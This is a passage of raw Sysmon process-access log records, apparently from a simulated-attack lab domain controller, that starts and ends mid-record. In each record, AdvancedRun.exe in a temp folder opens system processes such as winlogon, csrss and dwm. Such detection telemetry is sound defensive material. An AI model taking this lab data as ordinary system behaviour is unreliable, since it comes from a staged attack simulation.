\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2
10341000x80000000000000004080486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 